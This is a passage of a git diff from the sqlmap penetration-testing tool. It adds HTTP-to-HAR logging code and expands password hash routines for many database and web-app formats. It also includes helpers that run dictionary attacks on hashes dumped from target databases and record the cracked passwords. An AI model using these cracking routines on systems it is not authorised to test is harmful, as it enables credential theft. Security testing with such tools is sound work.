window.after(500, populate_tabs_background) + + # Set minimum window size + window.update() + window.minsize(800, 500) + + # Center the window on screen + center(window) + + # Start the GUI + window.mainloop() diff --git a/lib/utils/har.py b/lib/utils/har.py new file mode 100644 index 00000000000..cb34bf39179 --- /dev/null +++ b/lib/utils/har.py @@ -0,0 +1,236 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import base64 +import datetime +import io +import re +import time + +from lib.core.bigarray import BigArray +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.settings import VERSION +from thirdparty.six.moves import BaseHTTPServer as _BaseHTTPServer +from thirdparty.six.moves import http_client as _http_client + +# Reference: https://dvcs.w3.org/hg/webperf/raw-file/tip/specs/HAR/Overview.html +# http://www.softwareishard.com/har/viewer/ + +class HTTPCollectorFactory(object): + def __init__(self, harFile=False): + self.harFile = harFile + + def create(self): + return HTTPCollector() + +class HTTPCollector(object): + def __init__(self): + self.messages = BigArray() + self.extendedArguments = {} + + def setExtendedArguments(self, arguments): + self.extendedArguments = arguments + + def collectRequest(self, requestMessage, responseMessage, startTime=None, endTime=None): + self.messages.append(RawPair(requestMessage, responseMessage, + startTime=startTime, endTime=endTime, + extendedArguments=self.extendedArguments)) + + def obtain(self): + return {"log": { + "version": "1.2", + "creator": {"name": "sqlmap", "version": VERSION}, + "entries": [pair.toEntry().toDict() for pair in self.messages], + }} + +class RawPair(object): + def __init__(self, request, response, startTime=None, endTime=None, extendedArguments=None): + self.request = getBytes(request) + self.response = getBytes(response) + self.startTime = startTime + self.endTime = endTime + self.extendedArguments = extendedArguments or {} + + def toEntry(self): + return Entry(request=Request.parse(self.request), response=Response.parse(self.response), + startTime=self.startTime, endTime=self.endTime, + extendedArguments=self.extendedArguments) + +class Entry(object): + def __init__(self, request, response, startTime, endTime, extendedArguments): + self.request = request + self.response = response + self.startTime = startTime or 0 + self.endTime = endTime or 0 + self.extendedArguments = extendedArguments + + def toDict(self): + out = { + "request": self.request.toDict(), + "response": self.response.toDict(), + "cache": {}, + "timings": { + "send": -1, + "wait": -1, + "receive": -1, + }, + "time": int(1000 * (self.endTime - self.startTime)), + "startedDateTime": "%s%s" % (datetime.datetime.fromtimestamp(self.startTime).isoformat(), time.strftime("%z")) if self.startTime else None + } + out.update(self.extendedArguments) + return out + +class Request(object): + def __init__(self, method, path, httpVersion, headers, postBody=None, raw=None, comment=None): + self.method = method + self.path = path + self.httpVersion = httpVersion + self.headers = headers or {} + self.postBody = postBody + self.comment = comment.strip() if comment else comment + self.raw = raw + + @classmethod + def parse(cls, raw): + request = HTTPRequest(raw) + return cls(method=request.command, + path=request.path, + httpVersion=request.request_version, + headers=request.headers, + postBody=request.rfile.read(), + comment=request.comment, + raw=raw) + + @property + def url(self): + host = self.headers.get("Host", "unknown") + return "http://%s%s" % (host, self.path) + + def toDict(self): + out = { + "httpVersion": self.httpVersion, + "method": self.method, + "url": self.url, + "headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items()], + "cookies": [], + "queryString": [], + "headersSize": -1, + "bodySize": -1, + "comment": getText(self.comment), + } + + if self.postBody: + contentType = self.headers.get("Content-Type") + out["postData"] = { + "mimeType": contentType, + "text": getText(self.postBody).rstrip("\r\n"), + } + + return out + +class Response(object): + extract_status = re.compile(b'\\((\\d{3}) (.*)\\)') + + def __init__(self, httpVersion, status, statusText, headers, content, raw=None, comment=None): + self.raw = raw + self.httpVersion = httpVersion + self.status = status + self.statusText = statusText + self.headers = headers + self.content = content + self.comment = comment.strip() if comment else comment + + @classmethod + def parse(cls, raw): + altered = raw + comment = b"" + + if altered.startswith(b"HTTP response [") or altered.startswith(b"HTTP redirect ["): + stream = io.BytesIO(raw) + first_line = stream.readline() + parts = cls.extract_status.search(first_line) + status_line = "HTTP/1.0 %s %s" % (getText(parts.group(1)), getText(parts.group(2))) + remain = stream.read() + altered = getBytes(status_line) + b"\r\n" + remain + comment = first_line + + response = _http_client.HTTPResponse(FakeSocket(altered)) + response.begin() + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5942 + response.length = len(raw[raw.find(b"\r\n\r\n") + 4:]) + + try: + content = response.read() + except _http_client.IncompleteRead: + content = raw[raw.find(b"\r\n\r\n") + 4:].rstrip(b"\r\n") + + return cls(httpVersion="HTTP/1.1" if response.version == 11 else "HTTP/1.0", + status=response.status, + statusText=response.reason, + headers=response.msg, + content=content, + comment=comment, + raw=raw) + + def toDict(self): + content = { + "mimeType": self.headers.get("Content-Type"), + "text": self.content, + "size": len(self.content or "") + } + + binary = set([b'\0', b'\1']) + if any(c in binary for c in self.content): + content["encoding"] = "base64" + content["text"] = getText(base64.b64encode(self.content)) + else: + content["text"] = getText(content["text"]) + + return { + "httpVersion": self.httpVersion, + "status": self.status, + "statusText": self.statusText, + "headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items() if key.lower() != "uri"], + "cookies": [], + "content": content, + "headersSize": -1, + "bodySize": -1, + "redirectURL": "", + "comment": getText(self.comment), + } + +class FakeSocket(object): + # Original source: + # https://stackoverflow.com/questions/24728088/python-parse-http-response-string + + def __init__(self, response_text): + self._file = io.BytesIO(response_text) + + def makefile(self, *args, **kwargs): + return self._file + +class HTTPRequest(_BaseHTTPServer.BaseHTTPRequestHandler): + # Original source: + # https://stackoverflow.com/questions/4685217/parse-raw-http-headers + + def __init__(self, request_text): + self.comment = None + self.rfile = io.BytesIO(request_text) + self.raw_requestline = self.rfile.readline() + + if self.raw_requestline.startswith(b"HTTP request ["): + self.comment = self.raw_requestline + self.raw_requestline = self.rfile.readline() + + self.error_code = self.error_message = None + self.parse_request() + + def send_error(self, code, message): + self.error_code = code + self.error_message = message diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 554cdd143e8..13a978149af 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -1,34 +1,42 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + try: from crypt import crypt -except ImportError: +except: # removed ImportError because of https://github.com/sqlmapproject/sqlmap/issues/3171 from thirdparty.fcrypt.fcrypt import crypt -_multiprocessing = None try: - import multiprocessing + from Crypto.Cipher.DES import MODE_CBC as CBC + from Crypto.Cipher.DES import new as des +except: + from thirdparty.pydes.pyDes import CBC + from thirdparty.pydes.pyDes import des - # problems on FreeBSD (Reference: http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) - _ = multiprocessing.Queue() -except (ImportError, OSError): - pass -else: - _multiprocessing = multiprocessing +_multiprocessing = None +import base64 +import binascii +import gc +import math import os import re import tempfile import time +import zipfile from hashlib import md5 from hashlib import sha1 -from Queue import Queue +from hashlib import sha224 +from hashlib import sha256 +from hashlib import sha384 +from hashlib import sha512 from lib.core.common import Backend from lib.core.common import checkFile @@ -36,47 +44,63 @@ from lib.core.common import dataToStdout from lib.core.common import getFileItems from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite +from lib.core.common import isZipFile from lib.core.common import normalizeUnicode +from lib.core.common import openFile from lib.core.common import paths from lib.core.common import readInput from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage -from lib.core.convert import hexdecode -from lib.core.convert import hexencode -from lib.core.convert import utf8encode +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 +from lib.core.convert import decodeHex +from lib.core.convert import encodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.datatype import OrderedSet +from lib.core.decorators import cachedmethod from lib.core.enums import DBMS from lib.core.enums import HASH -from lib.core.exception import SqlmapFilePathException +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import COMMON_PASSWORD_SUFFIXES from lib.core.settings import COMMON_USER_COLUMNS +from lib.core.settings import DEV_EMAIL_ADDRESS from lib.core.settings import DUMMY_USER_PREFIX +from lib.core.settings import HASH_BINARY_COLUMNS_REGEX +from lib.core.settings import HASH_EMPTY_PASSWORD_MARKER from lib.core.settings import HASH_MOD_ITEM_DISPLAY from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD +from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT from lib.core.settings import IS_WIN from lib.core.settings import ITOA64 -from lib.core.settings import ML from lib.core.settings import NULL -from lib.core.settings import UNICODE_ENCODING from lib.core.settings import ROTATING_CHARS +from lib.core.settings import UNICODE_ENCODING from lib.core.wordlist import Wordlist -from thirdparty.pydes.pyDes import des -from thirdparty.pydes.pyDes import CBC +from thirdparty import six +from thirdparty.colorama.initialise import init as coloramainit +from thirdparty.six.moves import queue as _queue def mysql_passwd(password, uppercase=True): """ Reference(s): - http://csl.sublevel3.org/mysql-password-function/ + https://web.archive.org/web/20120215205312/http://csl.sublevel3.org/mysql-password-function/ >>> mysql_passwd(password='testpass', uppercase=True) '*00E247AC5F9AF26AE0194B41E1E769DEE1429A29' """ + password = getBytes(password) + retVal = "*%s" % sha1(sha1(password).digest()).hexdigest() return retVal.upper() if uppercase else retVal.lower() @@ -84,8 +108,8 @@ def mysql_passwd(password, uppercase=True): def mysql_old_passwd(password, uppercase=True): # prior to version '4.1' """ Reference(s): - http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c - http://voidnetwork.org/5ynL0rd/darkc0de/python_script/darkMySQLi.html + https://web.archive.org/web/20091205000600/http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c + https://github.com/pwnieexpress/pwn_plug_sources/blob/master/src/darkmysqli/DarkMySQLi.py >>> mysql_old_passwd(password='testpass', uppercase=True) '7DCDA0D57290B453' @@ -115,11 +139,31 @@ def postgres_passwd(password, username, uppercase=False): 'md599e5ea7a6f7c3269995cba3927fd0093' """ + username = getBytes(username) + password = getBytes(password) + retVal = "md5%s" % md5(password + username).hexdigest() return retVal.upper() if uppercase else retVal.lower() -def mssql_passwd(password, salt, uppercase=False): +def mssql_new_passwd(password, salt, uppercase=False): # since version '2012' + """ + Reference(s): + http://hashcat.net/forum/thread-1474.html + https://sqlity.net/en/2460/sql-password-hash/ + + >>> mssql_new_passwd(password='testpass', salt='4086ceb6', uppercase=False) + '0x02004086ceb6eb051cdbc5bdae68ffc66c918d4977e592f6bdfc2b444a7214f71fa31c35902c5b7ae773ed5f4c50676d329120ace32ee6bc81c24f70711eb0fc6400e85ebf25' + """ + + binsalt = decodeHex(salt) + unistr = b"".join((_.encode(UNICODE_ENCODING) + b"\0") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password) + + retVal = "0200%s%s" % (salt, sha512(unistr + binsalt).hexdigest()) + + return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) + +def mssql_passwd(password, salt, uppercase=False): # versions '2005' and '2008' """ Reference(s): http://www.leidecker.info/projects/phrasendrescher/mssql.c @@ -129,14 +173,14 @@ def mssql_passwd(password, salt, uppercase=False): '0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a' """ - binsalt = hexdecode(salt) - unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) + binsalt = decodeHex(salt) + unistr = b"".join((_.encode(UNICODE_ENCODING) + b"\0") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password) retVal = "0100%s%s" % (salt, sha1(unistr + binsalt).hexdigest()) return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) -def mssql_old_passwd(password, salt, uppercase=True): # prior to version '2005' +def mssql_old_passwd(password, salt, uppercase=True): # version '2000' and before """ Reference(s): www.exploit-db.com/download_pdf/15537/ @@ -147,8 +191,8 @@ def mssql_old_passwd(password, salt, uppercase=True): # prior to version '2005' '0x01004086CEB60C90646A8AB9889FE3ED8E5C150B5460ECE8425AC7BB7255C0C81D79AA5D0E93D4BB077FB9A51DA0' """ - binsalt = hexdecode(salt) - unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) + binsalt = decodeHex(salt) + unistr = b"".join((_.encode(UNICODE_ENCODING) + b"\0") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password) retVal = "0100%s%s%s" % (salt, sha1(unistr + binsalt).hexdigest(), sha1(unistr.upper() + binsalt).hexdigest()) @@ -165,9 +209,10 @@ def oracle_passwd(password, salt, uppercase=True): 'S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C' """ - binsalt = hexdecode(salt) + binsalt = decodeHex(salt) + password = getBytes(password) - retVal = "s:%s%s" % (sha1(utf8encode(password) + binsalt).hexdigest(), salt) + retVal = "s:%s%s" % (sha1(password + binsalt).hexdigest(), salt) return retVal.upper() if uppercase else retVal.lower() @@ -180,19 +225,23 @@ def oracle_old_passwd(password, username, uppercase=True): # prior to version ' 'F894844C34402B67' """ - IV, pad = "\0" * 8, "\0" + IV, pad = b"\0" * 8, b"\0" - if isinstance(username, unicode): - username = unicode.encode(username, UNICODE_ENCODING) # pyDes has issues with unicode strings + unistr = b"".join((b"\0" + _.encode(UNICODE_ENCODING)) if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in (username + password).upper()) - unistr = "".join("\0%s" % c for c in (username + password).upper()) + if des.__module__ == "Crypto.Cipher.DES": + unistr += b"\0" * ((8 - len(unistr) % 8) & 7) + cipher = des(decodeHex("0123456789ABCDEF"), CBC, iv=IV) + encrypted = cipher.encrypt(unistr) + cipher = des(encrypted[-8:], CBC, iv=IV) + encrypted = cipher.encrypt(unistr) + else: + cipher = des(decodeHex("0123456789ABCDEF"), CBC, IV, pad) + encrypted = cipher.encrypt(unistr) + cipher = des(encrypted[-8:], CBC, IV, pad) + encrypted = cipher.encrypt(unistr) - cipher = des(hexdecode("0123456789ABCDEF"), CBC, IV, pad) - encrypted = cipher.encrypt(unistr) - cipher = des(encrypted[-8:], CBC, IV, pad) - encrypted = cipher.encrypt(unistr) - - retVal = hexencode(encrypted[-8:]) + retVal = encodeHex(encrypted[-8:], binary=False) return retVal.upper() if uppercase else retVal.lower() @@ -202,6 +251,8 @@ def md5_generic_passwd(password, uppercase=False): '179ad45c6ce2cb97cf1029e212046e81' """ + password = getBytes(password) + retVal = md5(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() @@ -212,12 +263,96 @@ def sha1_generic_passwd(password, uppercase=False): '206c80413b9a96c1312cc346b7d2517b84463edd' """ + password = getBytes(password) + retVal = sha1(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() +def apache_sha1_passwd(password, **kwargs): + """ + >>> apache_sha1_passwd(password='testpass') + '{SHA}IGyAQTualsExLMNGt9JRe4RGPt0=' + """ + + password = getBytes(password) + + return "{SHA}%s" % getText(base64.b64encode(sha1(password).digest())) + +def ssha_passwd(password, salt, **kwargs): + """ + >>> ssha_passwd(password='testpass', salt='salt') + '{SSHA}mU1HPTvnmoXOhE4ROHP6sWfbfoRzYWx0' + """ + + password = getBytes(password) + salt = getBytes(salt) + + return "{SSHA}%s" % getText(base64.b64encode(sha1(password + salt).digest() + salt)) + +def ssha256_passwd(password, salt, **kwargs): + """ + >>> ssha256_passwd(password='testpass', salt='salt') + '{SSHA256}hhubsLrO/Aje9F/kJrgv5ZLE40UmTrVWvI7Dt6InP99zYWx0' + """ + + password = getBytes(password) + salt = getBytes(salt) + + return "{SSHA256}%s" % getText(base64.b64encode(sha256(password + salt).digest() + salt)) + +def ssha512_passwd(password, salt, **kwargs): + """ + >>> ssha512_passwd(password='testpass', salt='salt') + '{SSHA512}mCUSLfPMhXCQOJl9WHW/QMn9v9sjq7Ht/Wk7iVau8vLOfh+PeynkGMikqIE8sStFd0khdfcCD8xZmC6UyjTxsHNhbHQ=' + """ + + password = getBytes(password) + salt = getBytes(salt) + + return "{SSHA512}%s" % getText(base64.b64encode(sha512(password + salt).digest() + salt)) + +def sha224_generic_passwd(password, uppercase=False): + """ + >>> sha224_generic_passwd(password='testpass', uppercase=False) + '648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f' + """ + + retVal = sha224(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def sha256_generic_passwd(password, uppercase=False): + """ + >>> sha256_generic_passwd(password='testpass', uppercase=False) + '13d249f2cb4127b40cfa757866850278793f814ded3c587fe5889e889a7a9f6c' + """ + + retVal = sha256(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def sha384_generic_passwd(password, uppercase=False): + """ + >>> sha384_generic_passwd(password='testpass', uppercase=False) + '6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf' + """ + + retVal = sha384(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def sha512_generic_passwd(password, uppercase=False): + """ + >>> sha512_generic_passwd(password='testpass', uppercase=False) + '78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44' + """ + + retVal = sha512(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() -def crypt_generic_passwd(password, salt, uppercase=False): +def crypt_generic_passwd(password, salt, **kwargs): """ Reference(s): http://docs.python.org/library/crypt.html @@ -229,18 +364,145 @@ def crypt_generic_passwd(password, salt, uppercase=False): 'rl.3StKT.4T8M' """ - retVal = crypt(password, salt) + return getText(crypt(password, salt)) - return retVal.upper() if uppercase else retVal +def unix_md5_passwd(password, salt, magic="$1$", **kwargs): + """ + Reference(s): + http://www.sabren.net/code/python/crypt/md5crypt.py -def wordpress_passwd(password, salt, count, prefix, uppercase=False): + >>> unix_md5_passwd(password='testpass', salt='aD9ZLmkp') + '$1$aD9ZLmkp$DRM5a7rRZGyuuOPOjTEk61' + """ + + def _encode64(value, count): + output = "" + + while (count - 1 >= 0): + count = count - 1 + output += ITOA64[value & 0x3f] + value = value >> 6 + + return output + + password = getBytes(password) + magic = getBytes(magic) + salt = getBytes(salt) + + salt = salt[:8] + ctx = password + magic + salt + final = md5(password + salt + password).digest() + + for pl in xrange(len(password), 0, -16): + if pl > 16: + ctx = ctx + final[:16] + else: + ctx = ctx + final[:pl] + + i = len(password) + while i: + if i & 1: + ctx = ctx + b'\x00' # if ($i & 1) { $ctx->add(pack("C", 0)); } + else: + ctx = ctx + password[0:1] + i = i >> 1 + + final = md5(ctx).digest() + + for i in xrange(1000): + ctx1 = b"" + + if i & 1: + ctx1 = ctx1 + password + else: + ctx1 = ctx1 + final[:16] + + if i % 3: + ctx1 = ctx1 + salt + + if i % 7: + ctx1 = ctx1 + password + + if i & 1: + ctx1 = ctx1 + final[:16] + else: + ctx1 = ctx1 + password + + final = md5(ctx1).digest() + + hash_ = _encode64((int(ord(final[0:1])) << 16) | (int(ord(final[6:7])) << 8) | (int(ord(final[12:13]))), 4) + hash_ = hash_ + _encode64((int(ord(final[1:2])) << 16) | (int(ord(final[7:8])) << 8) | (int(ord(final[13:14]))), 4) + hash_ = hash_ + _encode64((int(ord(final[2:3])) << 16) | (int(ord(final[8:9])) << 8) | (int(ord(final[14:15]))), 4) + hash_ = hash_ + _encode64((int(ord(final[3:4])) << 16) | (int(ord(final[9:10])) << 8) | (int(ord(final[15:16]))), 4) + hash_ = hash_ + _encode64((int(ord(final[4:5])) << 16) | (int(ord(final[10:11])) << 8) | (int(ord(final[5:6]))), 4) + hash_ = hash_ + _encode64((int(ord(final[11:12]))), 2) + + return getText(magic + salt + b'$' + getBytes(hash_)) + +def joomla_passwd(password, salt, **kwargs): + """ + Reference: https://stackoverflow.com/a/10428239 + + >>> joomla_passwd(password='testpass', salt='6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf') + 'e3d5794da74e917637332e0d21b76328:6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf' + """ + + return "%s:%s" % (md5(getBytes(password) + getBytes(salt)).hexdigest(), salt) + +def django_md5_passwd(password, salt, **kwargs): + """ + Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py + + >>> django_md5_passwd(password='testpass', salt='salt') + 'md5$salt$972141bcbcb6a0acc96e92309175b3c5' + """ + + return "md5$%s$%s" % (salt, md5(getBytes(salt) + getBytes(password)).hexdigest()) + +def django_sha1_passwd(password, salt, **kwargs): + """ + Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py + + >>> django_sha1_passwd(password='testpass', salt='salt') + 'sha1$salt$6ce0e522aba69d8baa873f01420fccd0250fc5b2' + """ + + return "sha1$%s$%s" % (salt, sha1(getBytes(salt) + getBytes(password)).hexdigest()) + +def vbulletin_passwd(password, salt, **kwargs): + """ + Reference: https://stackoverflow.com/a/2202810 + + >>> vbulletin_passwd(password='testpass', salt='salt') + '85c4d8ea77ebef2236fb7e9d24ba9482:salt' + """ + + return "%s:%s" % (md5(binascii.hexlify(md5(getBytes(password)).digest()) + getBytes(salt)).hexdigest(), salt) + +def oscommerce_old_passwd(password, salt, **kwargs): + """ + Reference: http://ryanuber.com/09-24-2010/os-commerce-password-hashing.html + + >>> oscommerce_old_passwd(password='testpass', salt='6b') + '16d39816e4545b3179f86f2d2d549af4:6b' + """ + + return "%s:%s" % (md5(getBytes(salt) + getBytes(password)).hexdigest(), salt) + +def phpass_passwd(password, salt, count, prefix, **kwargs): """ Reference(s): - http://packetstormsecurity.org/files/74448/phpassbrute.py.txt + https://web.archive.org/web/20120219120128/packetstormsecurity.org/files/74448/phpassbrute.py.txt http://scriptserver.mainframe8.com/wordpress_password_hasher.php + https://www.openwall.com/phpass/ + https://github.com/jedie/django-phpBB3/blob/master/django_phpBB3/hashers.py - >>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp', uppercase=False) + >>> phpass_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$') '$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0' + >>> phpass_passwd(password='testpass', salt='Pb1j9gSb', count=2048, prefix='$H$') + '$H$9Pb1j9gSb/u3EVQ.4JDZ3LqtN44oIx/' + >>> phpass_passwd(password='testpass', salt='iwtD/g.K', count=128, prefix='$S$') + '$S$5iwtD/g.KZT2rwC9DASy/mGYAThkSd3lBFdkONi1Ig1IEpBpqG8W' """ def _encode64(input_, count): @@ -248,12 +510,12 @@ def _encode64(input_, count): i = 0 while i < count: - value = ord(input_[i]) + value = (input_[i] if isinstance(input_[i], int) else ord(input_[i])) i += 1 output = output + ITOA64[value & 0x3f] if i < count: - value = value | (ord(input_[i]) << 8) + value = value | ((input_[i] if isinstance(input_[i], int) else ord(input_[i])) << 8) output = output + ITOA64[(value >> 6) & 0x3f] @@ -262,7 +524,7 @@ def _encode64(input_, count): break if i < count: - value = value | (ord(input_[i]) << 16) + value = value | ((input_[i] if isinstance(input_[i], int) else ord(input_[i])) << 16) output = output + ITOA64[(value >> 12) & 0x3f] @@ -274,118 +536,216 @@ def _encode64(input_, count): return output - cipher = md5(salt) + password = getBytes(password) + f = {"$P$": md5, "$H$": md5, "$Q$": sha1, "$S$": sha512}[prefix] + + cipher = f(getBytes(salt)) cipher.update(password) hash_ = cipher.digest() for i in xrange(count): - _ = md5(hash_) + _ = f(hash_) _.update(password) hash_ = _.digest() - retVal = prefix + _encode64(hash_, 16) + retVal = "%s%s%s%s" % (prefix, ITOA64[int(math.log(count, 2))], salt, _encode64(hash_, len(hash_))) + + if prefix == "$S$": + # Reference: https://api.drupal.org/api/drupal/includes%21password.inc/constant/DRUPAL_HASH_LENGTH/7.x + retVal = retVal[:55] - return retVal.upper() if uppercase else retVal + return retVal __functions__ = { - HASH.MYSQL: mysql_passwd, - HASH.MYSQL_OLD: mysql_old_passwd, - HASH.POSTGRES: postgres_passwd, - HASH.MSSQL: mssql_passwd, - HASH.MSSQL_OLD: mssql_old_passwd, - HASH.ORACLE: oracle_passwd, - HASH.ORACLE_OLD: oracle_old_passwd, - HASH.MD5_GENERIC: md5_generic_passwd, - HASH.SHA1_GENERIC: sha1_generic_passwd, - HASH.CRYPT_GENERIC: crypt_generic_passwd, - HASH.WORDPRESS: wordpress_passwd, - } + HASH.MYSQL: mysql_passwd, + HASH.MYSQL_OLD: mysql_old_passwd, + HASH.POSTGRES: postgres_passwd, + HASH.MSSQL: mssql_passwd, + HASH.MSSQL_OLD: mssql_old_passwd, + HASH.MSSQL_NEW: mssql_new_passwd, + HASH.ORACLE: oracle_passwd, + HASH.ORACLE_OLD: oracle_old_passwd, + HASH.MD5_GENERIC: md5_generic_passwd, + HASH.SHA1_GENERIC: sha1_generic_passwd, + HASH.SHA224_GENERIC: sha224_generic_passwd, + HASH.SHA256_GENERIC: sha256_generic_passwd, + HASH.SHA384_GENERIC: sha384_generic_passwd, + HASH.SHA512_GENERIC: sha512_generic_passwd, + HASH.CRYPT_GENERIC: crypt_generic_passwd, + HASH.JOOMLA: joomla_passwd, + HASH.DJANGO_MD5: django_md5_passwd, + HASH.DJANGO_SHA1: django_sha1_passwd, + HASH.PHPASS: phpass_passwd, + HASH.APACHE_MD5_CRYPT: unix_md5_passwd, + HASH.UNIX_MD5_CRYPT: unix_md5_passwd, + HASH.APACHE_SHA1: apache_sha1_passwd, + HASH.VBULLETIN: vbulletin_passwd, + HASH.VBULLETIN_OLD: vbulletin_passwd, + HASH.OSCOMMERCE_OLD: oscommerce_old_passwd, + HASH.SSHA: ssha_passwd, + HASH.SSHA256: ssha256_passwd, + HASH.SSHA512: ssha512_passwd, + HASH.MD5_BASE64: md5_generic_passwd, + HASH.SHA1_BASE64: sha1_generic_passwd, + HASH.SHA256_BASE64: sha256_generic_passwd, + HASH.SHA512_BASE64: sha512_generic_passwd, +} + +def _finalize(retVal, results, processes, attack_info=None): + if _multiprocessing: + gc.enable() + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4367 + # NOTE: https://dzone.com/articles/python-101-creating-multiple-processes + for process in processes: + try: + process.terminate() + process.join() + except (OSError, AttributeError): + pass + + if retVal: + removals = set() + + if conf.hashDB: + conf.hashDB.beginTransaction() + + while not retVal.empty(): + user, hash_, word = item = retVal.get(block=False) + results.append(item) + removals.add((user, hash_)) + hashDBWrite(hash_, word) + + for item in attack_info or []: + if (item[0][0], item[0][1]) in removals: + attack_info.remove(item) + + if conf.hashDB: + conf.hashDB.endTransaction() + + if hasattr(retVal, "close"): + retVal.close() def storeHashesToFile(attack_dict): if not attack_dict: return - handle, filename = tempfile.mkstemp(suffix=".txt") - os.close(handle) - - warnMsg = "writing hashes to file '%s' " % filename - warnMsg += "for eventual further processing with other tools" - logger.warn(warnMsg) - - items = set() - - with open(filename, "w+") as f: - for user, hashes in attack_dict.items(): - for hash_ in hashes: - if not hash_ or hash_ == NULL or not hashRecognition(hash_): - continue + items = OrderedSet() + for user, hashes in attack_dict.items(): + for hash_ in hashes: + hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ + if hash_ and hash_ != NULL and hashRecognition(hash_): item = None if user and not user.startswith(DUMMY_USER_PREFIX): - item = "%s:%s\n" % (user.encode(UNICODE_ENCODING), hash_.encode(UNICODE_ENCODING)) + item = "%s:%s\n" % (user, hash_) else: - item = "%s\n" % hash_.encode(UNICODE_ENCODING) + item = "%s\n" % hash_ if item and item not in items: - f.write(item) items.add(item) + if kb.choices.storeHashes is None: + message = "do you want to store hashes to a temporary file " + message += "for eventual further processing with other tools [y/N] " + + kb.choices.storeHashes = readInput(message, default='N', boolean=True) + + if items and kb.choices.storeHashes: + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=".txt") + os.close(handle) + + infoMsg = "writing hashes to a temporary file '%s' " % filename + logger.info(infoMsg) + + with openFile(filename, "w+") as f: + for item in items: + try: + f.write(item) + except (UnicodeError, TypeError): + pass + def attackCachedUsersPasswords(): if kb.data.cachedUsersPasswords: results = dictionaryAttack(kb.data.cachedUsersPasswords) + lut = {} for (_, hash_, password) in results: - for user in kb.data.cachedUsersPasswords.keys(): - for i in xrange(len(kb.data.cachedUsersPasswords[user])): - if kb.data.cachedUsersPasswords[user][i] and hash_.lower() in kb.data.cachedUsersPasswords[user][i].lower()\ - and 'clear-text password' not in kb.data.cachedUsersPasswords[user][i].lower(): - kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', password) + lut[hash_.lower()] = password + + for user in kb.data.cachedUsersPasswords: + for i in xrange(len(kb.data.cachedUsersPasswords[user])): + if (kb.data.cachedUsersPasswords[user][i] or "").strip(): + value = kb.data.cachedUsersPasswords[user][i].lower().split()[0] + if value in lut: + kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value]) def attackDumpedTable(): if kb.data.dumpedTable: table = kb.data.dumpedTable - columns = table.keys() + columns = list(table.keys()) count = table["__infos__"]["count"] if not count: return - infoMsg = "analyzing table dump for possible password hashes" - logger.info(infoMsg) + debugMsg = "analyzing table dump for possible password hashes" + logger.debug(debugMsg) found = False col_user = '' col_passwords = set() attack_dict = {} + binary_fields = OrderedSet() + replacements = {} - for column in columns: + for column in sorted(columns, key=len, reverse=True): if column and column.lower() in COMMON_USER_COLUMNS: col_user = column break + for column in columns: + if 